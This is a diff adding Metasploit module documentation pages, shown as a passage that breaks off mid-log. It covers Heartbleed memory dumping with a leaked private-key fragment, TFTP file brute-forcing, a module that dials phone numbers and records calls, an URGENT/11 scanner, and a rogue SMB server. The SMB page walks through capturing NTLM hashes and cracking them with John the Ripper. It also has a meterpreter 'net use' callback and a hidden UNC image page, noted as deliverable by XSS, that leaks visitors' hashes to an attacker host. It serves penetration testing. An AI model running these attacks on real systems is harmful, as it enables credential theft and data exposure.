+Nx2YT7eEcEIMOzOYF0zUH/gLo7UbZXGk/GlupqWP7kumwALz5Hu3gnx5+c69A0yL
+FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg==
+-----END RSA PRIVATE KEY-----
+
+[*] 222.222.2.222:44330   - Private key stored in /root/.msf4/loot/20191012213218_default_222.222.2.222_openssl.heartble_250185.txt
+[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
+
+```
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
+action => DUMP
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
+
+[+] 222.222.2.222:44330   - Heartbeat response with leak, 65535 bytes
+[+] 222.222.2.222:44330   - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
+[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
+[*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
+
+���]�O���g�hE�_.[�MT��b��΋k�f��
+�"�!98����5����
+��	��32��ED��/�A���
+                        �      �@�DA8u-�	b�,��Y'L��Մ�ձ3��-�bt����`�;ˋz���4���
+�`���w��Vnvv�x���'�`���Y$�H                                                         |��k	E��ޞ=A�Gx�A��
+                           a��f�D�9I��W�ϋ3/�V�s�D%����|������Z;��1FF���)�vC���ny7m��N1v/�&�Y�T@��e�3�D�ʗ�O��pc��,�y��q�G�g��z��`^�s�Mk*����Ou���E�ぜ���l]�%<,�@��S�зN�	"�����"���ct{uj��Ц�*N���a\{�5vRNW��-4S�^0b�e��7���=r���J>D��)V)C�m�y�-�F,�~VMD�E
+�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
+31��R��S0Q0U�]�v%C��#��*�B|c
+K0U#0��]�v%C��#��*�B|c
+K0U�0�0 *�H��
+���^��#
+       怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
+
+1�ŏmA�,�s��l1v�d����m�i^�������y�}����5�2��'��s�M����G �U�2[������N�^p](������*\��3(ic�U��{�
+           E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��᨝-�
+                                                                    �ok{�΄�C2��
+                                                                               �g���N1A����B/w��!��)�U���B/w�����)�U�#�%��\ �rV���A#��_
+                                                                                                                                       �m&r�]�J�
+;���/_��
+���rD���WMZt0���*ʟ����J�bB�U
+
+|�ƭ���6���,s�d��7�s�8$,�I|��'�7ײ
+                                �X��j�%����uj}��Y�a'�Ks��V��c.���vn:
+B���c��q)GL�y0T�a&aZ�*q/#��������)�:յ�-����ހYi�R3�rb)��
+�����5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴ;�v��]��I@��Á�K7H��
+                                                                                                              i�,�ut�~�
+                                                                                                                       ߃��u*n��w����.�fU���	R�X��y��^��|�0��udh����F������>��-��y�n�Š�윀�1��P�����W
+                                                ��Ii�����/�|��+�l)Nv�c�3�U7��Xud@�o��z�(Lk ��0R|7���5�j^%����'L;S,"�����5	ӕv�;{q)�W�
+                                                                                                                                          zJX��>j�;��f��t��DQ�Ez/�Rݜ13
+1�ŏmA�,�s����)!��9��v-��B���Ь�%�o���k�kW�U�x���\`Sl�]@�$W�F�k�a���j�x���0��p�'�N���1n�}]�[d*9H�����@�YVE����'��s�
+           E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��᨝-�
+                                                                    �ok{�΄�C2��
+                                                                               �g���N1A����B/w��q��)�U!�Ɠ)�U���)�`0��)�U�@ɓ)�U!`��)�U!@��)�U!@��)�U���B/w��1��5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴq���)�U!��)�U��8NE<���GGΡ��)L��ңf�(+c��������'B<uΓU�PiS6�K��tgF�Z
+       ������
+�`dXQ4��
+�m�Q�J�G�R�(��w�!?e��1��J�On��}�v@é���eW8�N���p3�)�U A���)�U  ���@'�/1����������������1����������������1����oI,�Щ�������\�ͭ�r��&�1�����w�ۯ�H��#
+G�eO�IB�����u1�X�^�v�ͭ|Q��^��v�XC8��'a�Yu���!࿕)�U1�Y�"&�
+                                                       ����
+                                                           ����A��W��GЊ!���)�U�\7ڊ!p��)�U���)�U  `��)�U�\7ڊ!��)�U�\7ڊ!p��)�U�\7ڊ! ��)�U0��)�U  P��)�U�\����сFAp�0�:%6U�\7ڊ!���)�U�\7ڊ  �\7ڊ!�\7ڊ ��)�U 01���)�U1���)�UA�)�UA0)�UAapד)�U1���)�U����Z�Qe"�C)kUݠ�e6t7���6�u)��1�����
+mL�n�*�]`����D�>a���K�@V|�����Õ)�U<���!�!b��{����C�M>
+[����A8�%��Aθ�����ŪY�6K                              ��U߆�
+                       ��XA��5j�X��q�'}��c�u���Ͷ�W���9�*5������g�3��Q	�a7ڊ�a7ڊ�ĕ)�U�ĕ)�UP	�W��(E ��
+[&(yu0�.���I�V���t�1��fE�I̮N;��p˫�]�2�&^}        �� #����Ƃ�T�|i2�&~<�Q;T�B�TAﴕ:�/��H�^W��x�����]͓!��@@c7ڊ@c7ڊPd�)�UPd�)�Ulocalhost
+::1		localhost6.localdomain6	localhost6
+111.111.1.111   client
+
+# The following lines are desirable for IPv6 capable hosts
+::1     localhost ip6-localhost ip6-loopback
+fe00::0 ip6-localnet
+ff02::1 ip6-allnodes
+ff02::2 ip6-allrouters
+ff02::3 ip6-allhosts
+�� <%�N�O#&���+-91��,�q��k�sNV^I�
+�n
+  jgd0�`*�H��	��y�M�,0
+0E1
+   0	UAU10U
+
+Some-State1!0U
+
+201011031638Z0E1 Pty Ltd0
+                0	UAU10U
+
+Some-State1!0U
+
+�0�ernet*�H��its Pty Ltd0�"0
+���w/Bѷ��A1N���g�
+                 ?�2CׄΘ{ko�
+                          �-�����l���|�� �E`�S�#���U��׻ȱo����J>D��)V)C�m�y�-�F,�~VMD�E
+�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
+31��R��S0Q0U�]�v%C��#��*�B|c
+K0U#0��]�v%C��#��*�B|c
+K0U�0�0 *�H��
+���^��#
+       怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
+
+�Ѓ�������"�l1v�d����m�i^�������y�}����5�2�K?�!��M����G �U�2[������N�^p](������*\��3(ic�U��{�
+                                           GA8u-�	b�,��Y'L��Մ�ձ3��-�bt����`�;ˋz���4���
+�`���w��Vnvv�x���'�`���Y$�H                                                                 |��k	E��ޞ=A�Gx�A��
+                           a��f�D�9I��W�ϋ3/�V�s�D%����|������Z;��1FF���)�vC���ny7m��N1v/�&�Y�T@��e�3�D�ʗ�O��pc��,�y��q�G�g��z��`^�s�Mk*����Ou���E�ぜ����n��=*��LX-�*N���a\{�5vRNW��-4S�^0b�e��7���=r+A`d�)�Upt�)�U@q�U���)�U0;�)�U1����������������1߽�)bߜؐ0�x���.!�� ��4H�0܊�����\�A��������������������
+G�eO�IB�*�H��@q�	��y�M�,0
+0E1
+   0	UAU10U
+
+Some-State1!0U
+
+201011031638Z0E1 Pty Ltd0
+                0	UAU10U
+
+Some-State1!0U
+
+�0�ernet*�H��its Pty Ltd0�"0
+���w/Bѷ��A1N���g�
+                 ?�2CׄΘ{ko�
+                          �-�����l���|�� �E`�S�#���U��׻ȱo����J>D��)V)C�m�y�-�F,�~VMD�E
+�s��'����EVY�@�����H9*�[�]}�n1㺟N�'�p��0���x�j���a�k�F�W$�@]�lS`\���x�U�Wk�kƑ�o�%�Ё��B��-v��9��!)ᗙ�>�Ty�oXJ�
+31��R��S0Q0U�]�v%C��#��*�B|c
+K0U#0��]�v%C��#��*�B|c
+K0U�0�0 *�H��
+���^��#
+       怅W7��G�w�n�*wFcR�~����l8�C*]��@��g+;=�|8�b߬3
+
+�Ѓ�������"�l1v�d����m�i^�������y�}����5�2�q�Upѓ)�U D�)�U!�]�v%C��#��*�B|c�����*\��3(ic�U��{�
+K!���)�U!��)�U!�]�v%C��#��*�B|c
+K!�B�)�U����'�U0ؓ)�U�8�)�U0��)�U�@��)�U 9�)�U0��)�U`��)�U���)�U���)�U���)�U
+G�eO��Pϓ)�U     �U0v�'�U�X�'�U�X�'�U�b�'�U�b�'�U�b�'�Up�'�U�W�'�U�a�'�q�'�U�m�'�Uxt�'�U�����Q@��)�UA�����w�ۯ�H��#
+G�eO�IB�����u�)�U��)�U@!В�)�U!���)�U  !p��)�U  !���)�U�Ò)�U !���)�U  1�U���)�UQ ��)�UA����oI,�Щ�������\�ͭ�r��&��)�U@!1�Y�"&�
+                                                                                                                           ����
+                                                                                                                               ����A��W��GЊ`��)�U!Б�)�U�\7ڊ! ��)�U�\7ڊ��������!<�)�U�\7ڊ  �Ò)�U�\7ڊ�1p��)�U!@��)�U�\7ڊ`��)�U1@��)�U0QA�Y�"&�
+                                                                                     ����
+                                                                                         ����A��W��GЊ@10��)�Uq0��)�U���)�U�Rݜ13
+1�ŏmA�,�s����)!��9��v-��B���Ь�%�o���k�kW�U�x���\`Sl�]@�$W�F�k�a���j�x���0��p�'�N���1n�}]�[d*9H�����@�YVE����'��s�
+           E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��᨝-�
+                                                                    �ok{�΄�C2��
+                                                                               �g���N1A����B/w�����)�U,�܁���$z�K
+
+��
+����k��졽N�"A�EV����<)�HN�m[��s��y�w��6��2]�Q���=Mx,f.|E=�,�����n�D9 h3�F�4���~n��
+                                                                                  Zd�Z*wc�\�l��`Hԑ���0���TnzBeժ+e	A�#AV�̗��
+���]v��M��ɸ�=��O@��ʘEf�!�J3��Cvj������[�t.R��c�{���.�cy��ݵu&$�n�*�!����5�1Њغjx��fۢԐ`�c�����d�B�8�3�Hn7ȩ՜�ku����i2��B}o~�/n$ ��J������bqF�B�v��9IM�t'Vu����L5Z
+&�'��TO (�y��
+�`��~�Ie:��cdn��]"�g����}J\plA�FvKkR1:? ٭�	-�@�_�B�|��B��S��f�cVES]��V�^��Bm�
+                                                                                  �@���z���?_@D~o�]�
+                                                                                                    1
+V��WS��\���J�%�!݈��҅]�%�q���)�U1����������������08R6k��C����l�2�!S��|�G�j��G���>�w8q�_C��9�
+{=o�n�� ��3�E�b1p|�%�h���<�a:bhj��-�6Z���2�w��!pB�)�U@��)�U!�f{��?�Py0��\�����,�s/��ޫ���5�ơ�{*�{�N#W�"��,�VW���a�#��a9�k?b��9濞~���e�^�MQ�� ��n��w�x�Z%1�ŏmA�,�s��'��s�
+           E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��᨝-�
+                                                                    �ok{�΄�C2��
+                                                                               �g���N1A����B/w��!�)�U���)�U�#�%��\ �rV���A#��_
+                                                                                                                              �m&r�]�J�
+;���/_��
+���rD���WMZt0���*ʟ����J�bB�U
+
+|�ƭ���6���,s�d��7�s�8$,�I|��'�7ײ
+                                �X��j�%����uj}��Y�a'�Ks��V��c.���vn:
+B���c��q)GL�y0T�a&aZ�*q/#��������)�:յ�-����ހYi�R3�rb)��
+�����5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴ��	�:v���)6��jInld��P�-1��ɾ�
+                                                                                                                         ��DyE�����l�"��e�#��Ǽ���-<KN�{�<�T�����&���E�:Y��D����ʎ�������c#�I��h5<�-�y�ұ�ST$m��U�8||�j�S.ϖ���W�~d��j��訦Dx�&�օ��U���Gj��b'�0��h�р.:�W����a���p�X'�X��N7es����C'�ɒ$(�bM��܍�Rݜ13
+1�ŏmA�,�s����)!��9��v-��B���Ь�%�o���k�kW�U�x���\`Sl�]@�$W�F�k�a���j�x���0��p�'�N���1n�}]�[d*9H�����@�YVE����'��s�
+           E�DMV~�,F�-�y�m�C)V)×D>J���o�Ȼ����U���#�S�`E� ܚ|���l��᨝-�
+                                                                    �ok{�΄�C2��
+                                                                               �g���N1A����B/w��q��)�U!�Ɠ)�U���)�``��)�U�@ɓ)�U!��)�U���B/w��!@��)�U!@��)�U���B/w��1��5E����X?3w`>�"��p�퓱�Φ����q�/�}=9����'�PuJ�]�ȝ?l�]�cR$����-m���H,�D^��Ș{��5x��oS���-�ݴq���)�U!��)�U��8NE<���GGΡ��)L��ңf�(+c��������'B<uΓU�PiS6�K��tgF�Z
+              ������
+�`dXQ4��
+�m�Q�J�G�R�(��w�!?e��1��J�On��}�v@é���eW8�N���p3�)�U A���)�U  ���@'�/!�]7ڊ!�\7ڊ<�)�U 0���)�U1���)�U1��)�UAǕ)�U 1�\7ڊ�\7ڊ0 �\7ڊ!�)�U!�9�)!��)�U!@<�)�U !`;�)�U!0ӓ)1Q%c��ʹ�����������������!kaliUn�R�0h�"!ĝ���jfx��&���~�!�\7ڊ!ĝ���jfx��&���~�1����������������1����������������1
+V��WS��\���J�%�!݈��҅]�%�q�A`��'�Uѓ)�U�ջ'�UA��'�U��)�U�ջ'�UAP��)�U�ד)�U0��)�Ua1����������������� ĕ)�U�`p�0�"ϙ�L���f�p����^�=�6��=�q�nw�9��0D}�ci��t���G=�x����сFAp�0�:%6�Gh�F(��U�TDw'��le�G�`}��9-����Z�Qe"�C)kUݠ�e6t7���6�u)��1�����
+mL�n�*�]`����D�>a���K�@V|����q�'�UHn�'�U�v�'�U0v�'�U�X�'�U�X�'�U�b�'�U�b�'�U�b�'�Up�'�U�W�'�U�a�'�q�'�U�m�'�Uxt�'�U t�'�UxS�'�UpR�'�UPo�'�U�k�'�UXO�'�U`q�'�U�m�'�U�u�'�U(u�'�U�V�'�U�V�'�U`f�'�f�'�U]�'�U�\�'�U�o�'�U8l�'�U�U�'�Ue�'�U�[�'�U�p�'�U@m�'�U�n�'�U�k�'�U�M�'�UHM�'�U S�'�UR�'�UO�'�U�R�'�U�Q�'�U�N�'�U�M�'�U�L�'�UA���)�UA�@a7ڊ@a7ڊ@Ǖ)�U@Ǖ)�U��W��(E ��
+[&(yu0�.���I�V���t�1��fE�I̮N;��p˫�]�2�&^}        �� #����Ƃ�T�|i2�&~<�Q;T�B�TAﴕ:�/��H�^W��x�����]͓!���]�O��bC��Z�A�gw��it��Zy
+```
+
+The contents of `/etc/hosts` is visible in this file, as it was edited to prevent the `gethostbyname failure` issue previously noted.
+
+### Utilizing repeat
+
+Because arbitrary memory is dumped, a high volume application that uses openSSL will cycle potentially valuable data
+fairly often. The `repeat` command can be used to execute the module multiple times.
+
+```
+msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
+action => DUMP
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run
+
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+[*] 222.222.2.222:443     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+## Confirming using NMAP
+
+Utilizing the [ssl-heartbleed](https://nmap.org/nsedoc/scripts/ssl-heartbleed.html) script, we can replicate
+the `SCAN` action.
+
+```
+# nmap -p 44330 --script ssl-heartbleed 222.222.2.222
+Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 17:52 EDT
+Nmap scan report for ubuntu1804.romain (222.222.2.222)
+Host is up (0.0017s latency).
+
+PORT      STATE SERVICE
+44330/tcp open  unknown
+| ssl-heartbleed:
+|   VULNERABLE:
+|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
+|     State: VULNERABLE
+|     Risk factor: High
+|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
+|
+|     References:
+|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
+|       http://cvedetails.com/cve/2014-0160/
+|_      http://www.openssl.org/news/secadv_20140407.txt
+MAC Address: 00:0C:29:AA:AA:AA (VMware)
+
+Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
+```

documentation/modules/auxiliary/scanner/tftp/tftpbrute.md

@@ -0,0 +1,55 @@
+
+## Vulnerable Application
+
+This module attempts to find files on a TFTP server.  The default wordlist is [tftp.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/tftp.txt).
+This module will NOT attempt to download the entire file, it simply pulls the first 3 bytes to verify the file exists.
+
+### Install
+
+On Kali 2019.4 (rolling) one of the  TFTP server is the package `tftpd-hpa`.  This can be installed as follows:
+
+```
+apt-get install tftpd-hpa
+systemctl start tftpd-hpa
+```
+
+This creates the root tftp directory in `/srv/tftp`.  
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/tftp/tftpbrute```
+  4. Do: ```run```
+
+## Options
+
+  **DICTIONARY**
+
+  The newline separated list of files to find.  Default depends on install location, however it will be within `metasploit-framework/data/wordlists/tftp.txt`.
+
+## Scenarios
+
+### tftpd-hpa on Kali linux
+
+First, create a file to find:
+
+```
+echo "hello world" > /srv/tftp/test.txt
+```
+
+Now we can find the file:
+
+```
+msf5 > use auxiliary/scanner/tftp/tftpbrute 
+msf5 auxiliary(scanner/tftp/tftpbrute) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf5 auxiliary(scanner/tftp/tftpbrute) > set verbose true
+verbose => true
+msf5 auxiliary(scanner/tftp/tftpbrute) > run
+
+[+] Found test.txt on 1.1.1.1
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/tftp/tftpbrute) > 
+```

documentation/modules/auxiliary/scanner/voice/recorder.md

@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module dials a range of phone numbers and records audio from each answered call.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/voice/recorder`
+3. Do: `set IAX_HOST [ip]`
+4. Do: `set OUTPUT_PATH [path]`
+5. Do: `set TARGETS [phone numbers]`
+6. Do: `run`
+
+## Scenarios
+
+ ```
+  msf > use modules/auxiliary/scanner/voice/recorder
+  msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93
+    IAX_HOST => 10.0.183.93
+  msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio
+    OUTPUT_PATH => /root/voice
+  msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890
+    TARGETS => 123-456-7890
+  msf auxiliary(scanner/voice/recorder) > run
+    [*] Dialing 123-456-7890...
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 51 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 101 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 151 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 201 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 252 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 302 DTMF ''
+    [*]   Completed   Number: 123-456-7890  State: hangup Frames: 302 DTMF ''
+    [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md

@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+  This detects systems running vulnerable versions of the Interpeak IPnet TCP/IP stack, which may be exploitable due to bugs parsing malformed network packets which can lead to memory corruption or denial-of-service attack possibilities.
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/vxworks/urgent11_check`
+  2. Do: `set [RHOSTS]`, replacing `[RHOSTS]` with a list of hosts to test for the presence of the vulnerable IP stack.
+  2. Do: `set [RPORTS]`, replacing `[RPORTS]` with a list of possible service ports to interrogate for vulnerable stack behavior.
+  3. Do: ```run```
+  4. If the host is exposing an identifiable IPnet TCP/IP stack, it will print the endpoint and report a vuln.
+
+## Options
+
+  **RPORTS** Set to a comma or space-delimited list of ports to check for the vulnerability.
+
+  **VERBOSE** Set to see how the probabilities of a vulnerable host are calculated.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/vxworks/urgent11_check) > set RHOSTS 192.168.86.1 192.168.86.2
+RHOSTS => 192.168.86.1 192.168.86.2
+msf5 auxiliary(scanner/vxworks/urgent11_check) > set THREADS 2
+THREADS => 2
+msf5 auxiliary(scanner/vxworks/urgent11_check) > set RPORTS 21 22 23 80 443
+RPORTS => 21 22 23 80 443
+msf5 auxiliary(scanner/vxworks/urgent11_check) > run
+
+[*] 192.168.86.1:21 being checked
+[*] 192.168.86.2:21 being checked
+[*] 192.168.86.1:22 being checked
+[*] 192.168.86.1:23 being checked
+[*] 192.168.86.1:80 being checked
+[*] 192.168.86.1:443 being checked
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] 192.168.86.2:22 being checked
+[+] 192.168.86.2:22 affected by CVE-2019-12258
+[*] 192.168.86.2:23 being checked
+[*] 192.168.86.2:80 being checked
+[*] 192.168.86.2:443 being checked
+[+] 192.168.86.2:443 affected by CVE-2019-12258
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/vxworks/urgent11_check) >
+```

documentation/modules/auxiliary/server/capture/smb.md

@@ -0,0 +1,415 @@
+This module creates a mock SMBv1 server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`.
+
+SMBv1 is enabled by default on systems before, and including:
+
+ * Windows XP
+ * Windows Server 2008 R2
+
+Microsoft provides an article on how to detect, disable, and enable SMB in various versions
+[here](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/server/capture/smb```
+  3. Do: ```run```
+
+## Options
+
+  **CAINPWFILE**
+
+  A file to store Cain & Abel formatted captured hashes in
+
+  **CHALLENGE**
+
+  An 8 byte server challenge.  Default is `1122334455667788`
+
+  **JOHNPWFILE**
+
+  A file to store John the Ripper formatted hashes in
+
+## Scenarios
+
+### Linux Connection via smbclient
+
+Ubuntu 18.04 with `smbclient 4.7.6-Ubuntu` installed.
+
+Based on [shellvoide.com](https://www.shellvoide.com/hacks/how-to-setup-rogue-fake-smb-server-to-capture-credentials/)
+
+You'll need to set `client use spnego = no` under `[global]` in `smb.conf` to ensure SMBv1 compatibility.
+
+Server:
+
+```
+msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
+msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
+johnpwfile => /tmp/john
+msf5 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+[*] SMB Captured - 2019-09-25 22:44:04 -0400
+NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
+USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
+LMHASH:Disabled 
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:a6b70b49c8d42903fbe6231ce53a21ff 
+NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
+[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ... 
+```
+
+Client:
+
+```
+root@Kali:~# grep spnego /etc/samba/smb.conf 
+client use spnego = no
+root@Kali:~# smbclient //1.1.1.1/fake
+Enter WORKGROUP\root's password: 
+session setup failed: NT_STATUS_LOGON_FAILURE
+```
+
+Crack the Hash:
+
+```
+# cat /tmp/john_netntlmv2
+ubuntu::WORKGROUP:1122334455667788:a6b70b49c8d42903fbe6231ce53a21ff:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
+# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+test             (ubuntu)
+1g 0:00:00:00 DONE (2019-09-25 22:46) 11.11g/s 1865Kp/s 1865Kc/s 1865KC/s 24782478..playpen
+Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
+Session completed
+
+```
+
+### Windows XP via net use
+
+Method also confirmed on Windows 2008r2
+
+Based off of [hackers-arise.com](https://www.hackers-arise.com/single-post/2018/11/19/Metasploit-Basics-Part-20-Creating-a-Fake-SMB-Server-to-Capture-Credentials)
+
+The idea here is we have a shell on a Windows box where we can't `hashdump` due to user permissions.
+However, we're able to do a `net use` to make an `SMB` connection back to our server to get the
+user's hash, then hopefully crack it.
+
+```
+meterpreter > getuid
+Server username: WINXP\test
+meterpreter > hashdump
+[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
+msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
+johnpwfile => /tmp/john
+msf5 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf5 auxiliary(server/capture/smb) > 
+[*] Started service listener on 0.0.0.0:445 
+[*] Server started.
+
+msf5 auxiliary(server/capture/smb) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 892 created.
+Channel 1 created.
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\test\Desktop>net use \\1.1.1.1 fake
+
+[*] SMB Captured - 2019-09-25 22:26:04 -0400
+NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
+USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
+LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
+NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
+net use \\1.1.1.1 fake
+System error 1326 has occurred.
+
+Logon failure: unknown user name or bad password.
+
+
+C:\Documents and Settings\test\Desktop>
+```
+
+We're now able to use John the Ripper to crack the password.
+
+```
+# cat /tmp/john_netntlm 
+test::WINXP:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c:1122334455667788
+# john /tmp/john_netntlm --format=netlm  --wordlist=/usr/share/wordlists/rockyou.txt
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Loaded 1 password hash (netlm, LM C/R [DES 32/64])
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+FAKE             (test)
+1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
+Use the "--show --format=netlm" options to display all of the cracked passwords reliably
+Session completed
+```
+
+### UNC in Websites Vector
+
+One way to coax a user into creating an SMB connection is to embed it in a website
+
+First, create the website (we're using Kali for this) with the following content:
+```
+<html>
+<head>
+<title>UNC Example</title>
+</head>
+<body>
+<img src="file:////1.1.1.1/fake.jpg" width="0px" height="0px">
+</body>
+</html>
+```
+
+This file, for the example is in `/var/www/html/unc.html`.
+
+Also of note, this could be done via XSS or other injection technique.
+
+Start the webserver: ```service apache2 start```
+
+Server:
+```
+msf5 > use auxiliary/server/capture/smb
+msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
+johnpwfile => /tmp/john
+msf5 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf5 auxiliary(server/capture/smb) > 
+[*] Started service listener on 0.0.0.0:445 
+[*] Server started.
+[*] SMB Captured - 2019-09-26 14:01:37 -0400
